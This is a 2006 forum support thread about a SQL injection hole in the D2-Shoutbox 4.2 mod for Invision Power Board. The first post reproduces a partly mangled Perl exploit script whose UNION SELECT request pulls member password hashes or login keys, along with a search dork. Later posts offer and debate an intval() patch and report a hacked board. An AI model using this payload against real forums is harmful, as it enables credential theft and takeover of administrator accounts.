Invisionize - Forums > IPS Product Resources > IP.Board Legacy Versions > IP.Board 2.0.x > [2.0] Mod Support
Check out the FREE chatroom mod for IPB 3.x
  |
|
D2-Shoutbox 4.2.1
|
 Mar 7 2006, 05:57 PM
Post
#2596
|
|
|
Newbie  Group: Members Posts: 47 Joined: 20-April 03 Member No.: 5,015  |
Just a note.. There's an SQL injection exploit out for version 4.2 of this mod..
CODE #!/usr/bin/perl ######################################################### # _______ _______ ______ # # |______ |______ | \ # # ______| |______ |_____/ # # # #D2-Shoutbox 4.2(IPB Mod)<=SQL injection # #Created By SkOd # #SED security Team # #http://www.sed-team.be # #skod.uk@gmail.com # #ISRAEL # ######################################################### #google: #"Powered By D2-Shoutbox 4.2" ######################################################### use IO::Socket; $host = $ARGV[0]; $user = $ARGV[2]; $uid = $ARGV[3]; $pid = $ARGV[4]; $type = $ARGV[5]; sub type() { if($type==1){$row="password";} if($type==2){$row="member_login_key";} else{print "Just 1 Or 2\n";exit();} $sql="index.php?act=Shoutbox&view=saved&load=-1%20UNION%20SELECT%20null,null,null,null,".$row.",null,null,null%20FROM%20ibf_members%20where%20id=".$user."/*"; $path = $ARGV[1].$sql; } sub header() { print q{ ####################################################################### ### D2-Shoutbox 4.2 SQL injection Exploit ### ### Tested On D2-Shoutbox 4.2 And IPB 2.4 ### ### Created By SkOd, Sed Security Team ### ####################################################################### sedSB.pl [HOST] [DIR] [victim] [my id] [my md5 hash] [1-(1.*)/2-(2.*)] sedSB.pl www.host.com /forum/ 2 4500 f3b8a336b250ee595dc6ef6bac38b647 2 ####################################################################### } } sub sedsock() { $####k = ##::######::#####->new( Proto => "tcp", PeerAddr => $host, PeerPort => "80") || die "[-]Connect Failed\r\n"; print $sedsock "GET $path HTTP/1.1\n"; print $sedsock "Host: $host\n"; print $sedsock "Accept: */*\n"; print $sedsock "Cookie: member_id=$uid; pass_hash=$pid\n"; print $sedsock "Connection: close\n\n"; while($res = <$sedsock>){ $res =~ m/shout_s'>(.*?)<\/textarea>/ && print "[+]User: $user\n[+]Md5 Hash: $1\n"; } } if(@A#RGV < 6){ ######(); }else{ type(); sedsock(); } # milw0rm.com [2006-03-06] Sanitized the exploit so it is useless, but this WILL allow someone to take over your forum. |
 |
 
|
|
Mar 9 2006, 05:50 PM
Post
#2597
|
|
 Hello, I am CheetahShrk, and I am a smileyholic. Group: Members Posts: 4,474 Joined: 21-November 04 From: Space? Member No.: 133,540 IPB Version: Not Applicable |
heres my fix for teh above exploit
 open shoutbox.php in /sources/d2mods/shoutbox/ find CODE function render_saved_shouts() { global $ibforums, $DB, $std, $print; add under CODE $ibforums->input['load'] = intval($ibforums->input['load']); $ibforums->input['delete'] = intval($ibforums->input['delete']); This post has been edited by CheetahShrk: Mar 10 2006, 03:36 PM -------------------- IPB3 is just so <INSERT BAD WORDS USED IN POSITIVE WAYS> awesome.
|
|
|
|
|
Mar 9 2006, 05:55 PM
Post
#2598
|
|
 Death Walking Terror Group: Members Posts: 5,505 Joined: 24-February 04 From: Behind You With An Axe! Member No.: 86,630 IPB Version: 1.2.x |
Shouldn't it be as this...
CODE $ibforums->input['load'] = $std->make_clean($ibforums->input['load']); ??? -------------------- My Favorite Cannibal Corpse Website | Discuss Marketing, Search Engines, Programming, and Good Site Practices
Its easy to get a link to your site from me - ask me how! QUOTE(Seyeko @ Mar 7 2007, 08:38 AM) [snapback]1791116[/snapback] Who gives a crap really. its a darn Os and no one uses it but you and a few other people, its kinda like your forum. |
|
|
|
|
Mar 9 2006, 05:58 PM
Post
#2599
|
|
|
Hello, I am CheetahShrk, and I am a smileyholic. Group: Members Posts: 4,474 Joined: 21-November 04 From: Space? Member No.: 133,540 IPB Version: Not Applicable |
no because load is an integer input so you only run it through the php built in cleaner since intval is for returning 0 if the input is not an number, what you posted is for a whole overcomplicated text input and wastes resources. When it comes to cleaning interger(number) only inputs, always use intval, it returns 0 if the input is not a number and returns the same number if a number is inputted.
This post has been edited by CheetahShrk: Mar 9 2006, 06:02 PM -------------------- IPB3 is just so <INSERT BAD WORDS USED IN POSITIVE WAYS> awesome.
|
|
|
|
|
Mar 9 2006, 06:02 PM
Post
#2600
|
|
 I can be cute, or i can be brute Group: Members Posts: 1,097 Joined: 8-June 05 From: Athens, Greece Member No.: 161,905 IPB Version: 2.0.x |
the problem with both fixes as far as i am concerned, is :
can wwe be sure we are set now ? i am sorry to keep asking that, it is just my first day on this world as a hacked board owner -------------------- |
|
|
|
|
Mar 9 2006, 06:22 PM
Post
#2601
|
|
|
Hello, I am CheetahShrk, and I am a smileyholic. Group: Members Posts: 4,474 Joined: 21-November 04 From: Space? Member No.: 133,540 IPB Version: Not Applicable |
QUOTE(NickTheGreek @ Mar 9 2006, 07:02 PM) [snapback]1652957[/snapback] the problem with both fixes as far as i am concerned, is : can wwe be sure we are set now ? i am sorry to keep asking that, it is just my first day on this world as a hacked board owner Uh, use my fix only as it won't do something useless and it's fast Should be set, if Im nice I might look through other inputs to make sure they are intvaled correctly though thats really deans job. -------------------- IPB3 is just so <INSERT BAD WORDS USED IN POSITIVE WAYS> awesome.
|
|
|
|
|
Mar 9 2006, 06:33 PM
Post
#2602
|
|
|
I can be cute, or i can be brute Group: Members Posts: 1,097 Joined: 8-June 05 From: Athens, Greece Member No.: 161,905 IPB Version: 2.0.x |
thanx mate...
if you manage to find some time and check the rest of the code, i would be grateful... i just revised some of the code and there is no $ibforums->input['load'] = intval($ibforums->input['load']) but in 2-3 cases ... this could mean potential other exploits, i dunno -------------------- |
|
|
|
|
Mar 9 2006, 06:37 PM
Post
#2603
|
|
|
Hello, I am CheetahShrk, and I am a smileyholic. Group: Members Posts: 4,474 Joined: 21-November 04 From: Space? Member No.: 133,540 IPB Version: Not Applicable |
you only need it in that one function as the other functions do not use load so it will be fine being defined once not twice or triple , just once at the top will affect all instances of it in the function, it shouldnt matter in switch cases as it will have to be a number or it will go default.
This post has been edited by CheetahShrk: Mar 9 2006, 06:38 PM -------------------- IPB3 is just so <INSERT BAD WORDS USED IN POSITIVE WAYS> awesome.
|
|
|
|
|
Mar 10 2006, 10:21 AM
Post
#2604
|
|
|
I can be cute, or i can be brute Group: Members Posts: 1,097 Joined: 8-June 05 From: Athens, Greece Member No.: 161,905 IPB Version: 2.0.x |
the suggested code DID not work
i reply DID NOT WORK... same person attacked in front of me demonstrating this ( i was absent the first time but now i saw that ) he changed my root admin pass... D2 Shoutbox is still with security leaks -------------------- |
|
|
|
|
Mar 10 2006, 03:29 PM
Post
#2605
|
|
 Advanced Member Group: Members Posts: 364 Joined: 9-September 03 From: Roswell, GA, USA Member No.: 41,519 IPB Version: 2.3.x |
This exploit has been formally published now: http://www.securityfocus.com/bid/16984
This post has been edited by cooldude7273: Mar 10 2006, 03:30 PM -------------------- Get The Biggest Bot List for IPB 2.x
Now at Version 5.0.3! Let IPB Identify and Log Bots from Hundreds of Sites! Download The Biggest Bot List NOW! |
|
|
|
|
Mar 10 2006, 03:37 PM
Post
#2606
|
|
|
Hello, I am CheetahShrk, and I am a smileyholic. Group: Members Posts: 4,474 Joined: 21-November 04 From: Space? Member No.: 133,540 IPB Version: Not Applicable |
Ignore Nickthegreek
the patch does work heres my fix for teh above exploit open shoutbox.php in /sources/d2mods/shoutbox/ find CODE function render_saved_shouts() { global $ibforums, $DB, $std, $print; add under CODE $ibforums->input['load'] = intval($ibforums->input['load']); $ibforums->input['delete'] = intval($ibforums->input['delete']); Patch it asap. -------------------- IPB3 is just so <INSERT BAD WORDS USED IN POSITIVE WAYS> awesome.
|
|
|
|
|
Mar 10 2006, 03:39 PM
Post
#2607
|
|
|
I can be cute, or i can be brute Group: Members Posts: 1,097 Joined: 8-June 05 From: Athens, Greece Member No.: 161,905 IPB Version: 2.0.x |
thanx for the support
-------------------- |
|
|
|
|
Mar 10 2006, 03:59 PM
Post
#2608
|
|
|
Member Group: Members Posts: 116 Joined: 5-May 05 Member No.: 156,910 IPB Version: 2.1.x |
I thank Dean for all of his mods! I used lots of them. The ideas behind them are great! But I sometimes get the feeling he is 98% ready and wants to play with a new mod so he leaves the last 2% for php-newbies to figure out.
Now I read on the pages of D-Scripting that we should not bother Dean with this problem because this mod is for 2.0.x and he does not give support on 'older' versions of mods... Excuse me, but when did Invision 2.0.x become old?? I applied tons of hours in modifying my 2.0.4 boards and now Dean wants me to start all over with the 2.1.x board? Come on! Spend a few hours and finalize this mod!! But as with the questions for the scrollbars in Firefox I imagine this cry for help is wasted too.... I love your coding Dean, but if this is really how you look at your 'costumers' problems, I will never install one of your mods again! I can't have this! Because when you do the mods for 2.1.x only for 98% what is the point of upgrading? Don't get me wrong! My members love your shoutbox, so I will make backups every day hoping the hackers can't find me, but somehow I think the day will come. You are a wizard at coding mods! The speed in which you come up with them is awesome! But you just have to finish them! Look at the D-Portal! Please don't let anyone tell me it is finished! Bfarber may have put less functions in his portal, but it IS finished! And take the people who install your mods serious as they depend on that! Better wait until coding for 2.1.x until 2.0.x is ready, or people won't be installing your mods anymore!! I hope noone feels I am breaking Dean down, for that is not my intention. I just think that lots of people feel the same way! I patched it as you mentioned Nick! I hope it is sufficient! Thanx for the support that others donn't bother with... -------------------- |
|
|
|
|
Mar 10 2006, 04:07 PM
Post
#2609
|
|
|
Hello, I am CheetahShrk, and I am a smileyholic. Group: Members Posts: 4,474 Joined: 21-November 04 From: Space? Member No.: 133,540 IPB Version: Not Applicable |
QUOTE(starbuckje @ Mar 10 2006, 04:59 PM) [snapback]1653426[/snapback] I patched it as you mentioned Nick! I hope it is sufficient! Don't remember seeing nick making teh patch lol -------------------- IPB3 is just so <INSERT BAD WORDS USED IN POSITIVE WAYS> awesome.
|
|
|
|
|
Mar 10 2006, 04:09 PM
Post
#2610
|
|
|
Member Group: Members Posts: 116 Joined: 5-May 05 Member No.: 156,910 IPB Version: 2.1.x |
Ahum, I ment Cheetah!! Sorry!!! Won't happen again!!!!
Thank G*d you say 'lol'
-------------------- |
|
|
|
|
1 User(s) are reading this topic (1 Guests and 0 Anonymous Users)
0 Members:
|
Lo-Fi Version | Time is now: 18th March 2010 - 06:55 PM |